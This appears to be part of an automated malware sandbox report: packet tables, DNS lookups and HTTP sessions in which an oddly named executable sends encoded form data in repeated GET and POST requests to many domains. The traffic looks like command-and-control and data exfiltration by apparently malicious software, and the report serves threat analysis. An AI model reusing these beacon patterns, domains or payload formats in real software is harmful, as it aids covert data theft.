                                  May 27, 2024 12:36:00.908560991 CEST8049740216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:00.908623934 CEST8049740216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:00.908657074 CEST8049740216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:00.908689976 CEST8049740216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:00.908720970 CEST8049740216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:00.908848047 CEST4974080192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:00.908848047 CEST4974080192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:00.909221888 CEST8049740216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:00.909526110 CEST4974080192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:01.668843031 CEST4974080192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:02.689831018 CEST4974180192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:02.694777966 CEST8049741216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:02.697937965 CEST4974180192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:02.701807976 CEST4974180192.168.2.7216.40.34.41
                                  May 27, 2024 12:36:02.706697941 CEST8049741216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:03.248888969 CEST8049741216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:03.248913050 CEST8049741216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:03.248924017 CEST8049741216.40.34.41192.168.2.7
                                  May 27, 2024 12:36:03.248959064 CEST8049741216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.379723072 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.382560968 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.387547970 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.387650013 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893853903 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893867016 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893887997 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893901110 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893918037 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893927097 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893945932 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893954992 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.893964052 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893978119 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.893995047 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.894007921 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.894046068 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.899312973 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.901091099 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.901101112 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.901252031 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.980779886 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980792046 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980838060 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980889082 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980895996 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.980925083 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.980946064 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.980963945 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:17.981297970 CEST8049762216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:17.981353998 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:20.222023010 CEST4976280192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.234376907 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.239306927 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.239420891 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.241363049 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.246345043 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735172033 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735198975 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735208988 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735266924 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735285044 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735296965 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735306978 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735357046 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.735403061 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.735411882 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:21.735459089 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.739662886 CEST4976380192.168.2.7216.40.34.41
                                  May 27, 2024 12:37:21.744611025 CEST8049763216.40.34.41192.168.2.7
                                  May 27, 2024 12:37:27.275835037 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:27.280755043 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:27.281044960 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:27.283700943 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:27.288600922 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:28.150044918 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:28.150319099 CEST8049764152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:28.150460005 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:28.794341087 CEST4976480192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.815866947 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.820812941 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:29.820947886 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.823894978 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:29.829078913 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:30.691446066 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:30.691622019 CEST8049765152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:30.691696882 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:31.325166941 CEST4976580192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.344743013 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.349770069 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:32.349853992 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.352309942 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:32.357275963 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:32.357361078 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:33.251585960 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:33.251842976 CEST8049766152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:33.256792068 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:34.684489012 CEST4976680192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.703176022 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.708472013 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:35.709691048 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.713799953 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:35.719624996 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:36.612344980 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:36.612442017 CEST8049767152.32.189.143192.168.2.7
                                  May 27, 2024 12:37:36.612624884 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:36.615174055 CEST4976780192.168.2.7152.32.189.143
                                  May 27, 2024 12:37:36.619992971 CEST8049767152.32.189.143192.168.2.7
                                  TimestampSource PortDest PortSource IPDest IP
                                  May 27, 2024 12:34:06.390666008 CEST4935753192.168.2.71.1.1.1
                                  May 27, 2024 12:34:06.749609947 CEST53493571.1.1.1192.168.2.7
                                  May 27, 2024 12:34:23.962462902 CEST6217753192.168.2.71.1.1.1
                                  May 27, 2024 12:34:24.046802998 CEST53621771.1.1.1192.168.2.7
                                  May 27, 2024 12:34:37.316772938 CEST6367153192.168.2.71.1.1.1
                                  May 27, 2024 12:34:37.407128096 CEST53636711.1.1.1192.168.2.7
                                  May 27, 2024 12:34:50.812757969 CEST5015153192.168.2.71.1.1.1
                                  May 27, 2024 12:34:50.826881886 CEST53501511.1.1.1192.168.2.7
                                  May 27, 2024 12:35:05.484013081 CEST5127253192.168.2.71.1.1.1
                                  May 27, 2024 12:35:05.498781919 CEST53512721.1.1.1192.168.2.7
                                  May 27, 2024 12:35:19.047758102 CEST5556753192.168.2.71.1.1.1
                                  May 27, 2024 12:35:19.245074987 CEST53555671.1.1.1192.168.2.7
                                  May 27, 2024 12:35:32.343859911 CEST6542853192.168.2.71.1.1.1
                                  May 27, 2024 12:35:32.471004963 CEST53654281.1.1.1192.168.2.7
                                  May 27, 2024 12:35:45.656924963 CEST6281653192.168.2.71.1.1.1
                                  May 27, 2024 12:35:45.718807936 CEST53628161.1.1.1192.168.2.7
                                  May 27, 2024 12:35:59.844746113 CEST5774753192.168.2.71.1.1.1
                                  May 27, 2024 12:36:00.147327900 CEST53577471.1.1.1192.168.2.7
                                  May 27, 2024 12:36:13.710664988 CEST6047553192.168.2.71.1.1.1
                                  May 27, 2024 12:36:14.700414896 CEST6047553192.168.2.71.1.1.1
                                  May 27, 2024 12:36:14.796113968 CEST53604751.1.1.1192.168.2.7
                                  May 27, 2024 12:36:14.796387911 CEST53604751.1.1.1192.168.2.7
                                  May 27, 2024 12:36:28.047086000 CEST6231853192.168.2.71.1.1.1
                                  May 27, 2024 12:36:28.262643099 CEST53623181.1.1.1192.168.2.7
                                  May 27, 2024 12:36:41.627422094 CEST5297253192.168.2.71.1.1.1
                                  May 27, 2024 12:36:42.424490929 CEST53529721.1.1.1192.168.2.7
                                  May 27, 2024 12:36:57.031725883 CEST5898853192.168.2.71.1.1.1
                                  May 27, 2024 12:36:57.139758110 CEST53589881.1.1.1192.168.2.7
                                  May 27, 2024 12:37:12.016524076 CEST6516653192.168.2.71.1.1.1
                                  May 27, 2024 12:37:12.298794031 CEST53651661.1.1.1192.168.2.7
                                  May 27, 2024 12:37:26.751667023 CEST4981353192.168.2.71.1.1.1
                                  May 27, 2024 12:37:27.271588087 CEST53498131.1.1.1192.168.2.7
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  May 27, 2024 12:34:06.390666008 CEST | 192.168.2.7 | 1.1.1.1 | 0x8b6 | Standard query (0) | www.crxwdix.store | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:23.962462902 CEST | 192.168.2.7 | 1.1.1.1 | 0xe5a1 | Standard query (0) | www.gett.hu | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:37.316772938 CEST | 192.168.2.7 | 1.1.1.1 | 0xe1fe | Standard query (0) | www.lets-goo.ru | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:50.812757969 CEST | 192.168.2.7 | 1.1.1.1 | 0xe154 | Standard query (0) | www.emgeecontracting.shop | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:05.484013081 CEST | 192.168.2.7 | 1.1.1.1 | 0x9114 | Standard query (0) | www.duobao698.com | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:19.047758102 CEST | 192.168.2.7 | 1.1.1.1 | 0xf682 | Standard query (0) | www.drdavidglassman.com | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:32.343859911 CEST | 192.168.2.7 | 1.1.1.1 | 0xb57a | Standard query (0) | www.friendsfavorites.pet | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:45.656924963 CEST | 192.168.2.7 | 1.1.1.1 | 0x4888 | Standard query (0) | www.featuringnature.de | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:59.844746113 CEST | 192.168.2.7 | 1.1.1.1 | 0xbcf3 | Standard query (0) | www.kohfour.com | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:13.710664988 CEST | 192.168.2.7 | 1.1.1.1 | 0x3e0b | Standard query (0) | www.getmall.online | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:14.700414896 CEST | 192.168.2.7 | 1.1.1.1 | 0x3e0b | Standard query (0) | www.getmall.online | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:28.047086000 CEST | 192.168.2.7 | 1.1.1.1 | 0xb776 | Standard query (0) | www.uqdr.cn | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:41.627422094 CEST | 192.168.2.7 | 1.1.1.1 | 0xb674 | Standard query (0) | www.kernelphysics.com | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:57.031725883 CEST | 192.168.2.7 | 1.1.1.1 | 0x9857 | Standard query (0) | www.theppelin.online | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:37:12.016524076 CEST | 192.168.2.7 | 1.1.1.1 | 0x2108 | Standard query (0) | www.botcsllc.com | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:37:26.751667023 CEST | 192.168.2.7 | 1.1.1.1 | 0xd4c6 | Standard query (0) | www.shengniu.com | A (IP address) | IN (0x0001) | false
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  May 27, 2024 12:34:06.749609947 CEST | 1.1.1.1 | 192.168.2.7 | 0x8b6 | No error (0) | www.crxwdix.store |  | 124.156.151.111 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:24.046802998 CEST | 1.1.1.1 | 192.168.2.7 | 0xe5a1 | No error (0) | www.gett.hu | gett.hu |  | CNAME (Canonical name) | IN (0x0001) | false
                                  May 27, 2024 12:34:24.046802998 CEST | 1.1.1.1 | 192.168.2.7 | 0xe5a1 | No error (0) | gett.hu |  | 193.201.190.93 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:37.407128096 CEST | 1.1.1.1 | 192.168.2.7 | 0xe1fe | No error (0) | www.lets-goo.ru |  | 104.21.81.245 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:37.407128096 CEST | 1.1.1.1 | 192.168.2.7 | 0xe1fe | No error (0) | www.lets-goo.ru |  | 172.67.192.34 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:34:50.826881886 CEST | 1.1.1.1 | 192.168.2.7 | 0xe154 | No error (0) | www.emgeecontracting.shop | emgeecontracting.shop |  | CNAME (Canonical name) | IN (0x0001) | false
                                  May 27, 2024 12:34:50.826881886 CEST | 1.1.1.1 | 192.168.2.7 | 0xe154 | No error (0) | emgeecontracting.shop |  | 69.57.162.24 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:05.498781919 CEST | 1.1.1.1 | 192.168.2.7 | 0x9114 | No error (0) | www.duobao698.com | duobao698.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                  May 27, 2024 12:35:05.498781919 CEST | 1.1.1.1 | 192.168.2.7 | 0x9114 | No error (0) | duobao698.com |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:05.498781919 CEST | 1.1.1.1 | 192.168.2.7 | 0x9114 | No error (0) | duobao698.com |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:19.245074987 CEST | 1.1.1.1 | 192.168.2.7 | 0xf682 | No error (0) | www.drdavidglassman.com |  | 199.59.243.225 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:32.471004963 CEST | 1.1.1.1 | 192.168.2.7 | 0xb57a | No error (0) | www.friendsfavorites.pet | 94950.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                  May 27, 2024 12:35:32.471004963 CEST | 1.1.1.1 | 192.168.2.7 | 0xb57a | No error (0) | 94950.bodis.com |  | 199.59.243.225 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:45.718807936 CEST | 1.1.1.1 | 192.168.2.7 | 0x4888 | No error (0) | www.featuringnature.de | featuringnature.de |  | CNAME (Canonical name) | IN (0x0001) | false
                                  May 27, 2024 12:35:45.718807936 CEST | 1.1.1.1 | 192.168.2.7 | 0x4888 | No error (0) | featuringnature.de |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:35:45.718807936 CEST | 1.1.1.1 | 192.168.2.7 | 0x4888 | No error (0) | featuringnature.de |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:00.147327900 CEST | 1.1.1.1 | 192.168.2.7 | 0xbcf3 | No error (0) | www.kohfour.com |  | 216.40.34.41 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:14.796113968 CEST | 1.1.1.1 | 192.168.2.7 | 0x3e0b | No error (0) | www.getmall.online |  | 203.161.43.228 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:14.796387911 CEST | 1.1.1.1 | 192.168.2.7 | 0x3e0b | No error (0) | www.getmall.online |  | 203.161.43.228 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:28.262643099 CEST | 1.1.1.1 | 192.168.2.7 | 0xb776 | No error (0) | www.uqdr.cn |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:28.262643099 CEST | 1.1.1.1 | 192.168.2.7 | 0xb776 | No error (0) | www.uqdr.cn |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:42.424490929 CEST | 1.1.1.1 | 192.168.2.7 | 0xb674 | No error (0) | www.kernelphysics.com |  | 45.64.187.212 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:36:57.139758110 CEST | 1.1.1.1 | 192.168.2.7 | 0x9857 | No error (0) | www.theppelin.online |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:37:12.298794031 CEST | 1.1.1.1 | 192.168.2.7 | 0x2108 | No error (0) | www.botcsllc.com |  | 216.40.34.41 | A (IP address) | IN (0x0001) | false
                                  May 27, 2024 12:37:27.271588087 CEST | 1.1.1.1 | 192.168.2.7 | 0xd4c6 | No error (0) | www.shengniu.com |  | 152.32.189.143 | A (IP address) | IN (0x0001) | false
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.7 | 49710 | 124.156.151.111 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:06.769299030 CEST | 488 | OUT | GET /y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.crxwdix.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:07.946592093 CEST | 348 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx
                                  Date: Mon, 27 May 2024 10:34:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: *
                                  Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,Token
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.7 | 49711 | 193.201.190.93 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:24.060775042 CEST | 733 | OUT | POST /1df8/ HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.gett.hu
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.gett.hu/1df8/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=KIb1Xcz2b0aqtYGwSbIUuCgXHrzDs8iE7BvkZMpAPebcWKaMXb75lLWg+9ODstc2B2JjxFKlwSoIJvQlR536wEdRMIqYceI02V5s0uFfGw+QyYoUC/toyvB28dP6X1entszVs7MNocdetjOWzYcZzcKO1JUgiF6bkSKBYuWM0I/TSR8YBlgZsLzrZVrZmheWywtE6xC41sl38l47+w==
                                  May 27, 2024 12:34:24.880057096 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:24 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.7 | 49712 | 193.201.190.93 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:26.600580931 CEST | 753 | OUT | POST /1df8/ HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.gett.hu
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.gett.hu/1df8/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=KIb1Xcz2b0aqt4WwQ4QUmCgWLLzD7siA7BjkZNtqPsvcTeSMUeP5mLWgwdOCotc9B31VxHulwUEIJrUlROb5xUc3ZYqGT+I02V5s0uh1GwmQyoYUAdFr8PB17dP6dVfutsyAs6QnoaRetmyWzNoamMKAq5VJj3KXtSiaUMWS+/POaHh6bHs1yaLQdXPvxHDjwxpc3T2ZqbAdx3Z/oN3PSPJ7Qc/d40+vNDT9g1s=
                                  May 27, 2024 12:34:27.248662949 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:27 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.7 | 49714 | 193.201.190.93 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:29.132972956 CEST | 1766 | OUT | POST /1df8/ HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.gett.hu
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.gett.hu/1df8/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:29.820441008 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:29 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.7 | 49715 | 193.201.190.93 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:31.663728952 CEST | 482 | OUT | GET /1df8/?4h=HKzVUqf1aEuVi+2sXpcO0QRiAr3gocmC4R78U/lSG5GPWeqrEM/dj7KCi/m7j8wlbFRbxXaftyt8S80LR8LDtnhaMK2/eM8I7y9bqMxgYhPG1v0QEsNv7Olz+oqDA3TDqZmGkZkE9/dY&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:32.305011034 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:32 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.7 | 49716 | 104.21.81.245 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:34:37.421438932 CEST | 745 | OUT | POST /jcz4/ HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.lets-goo.ru
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.lets-goo.ru/jcz4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
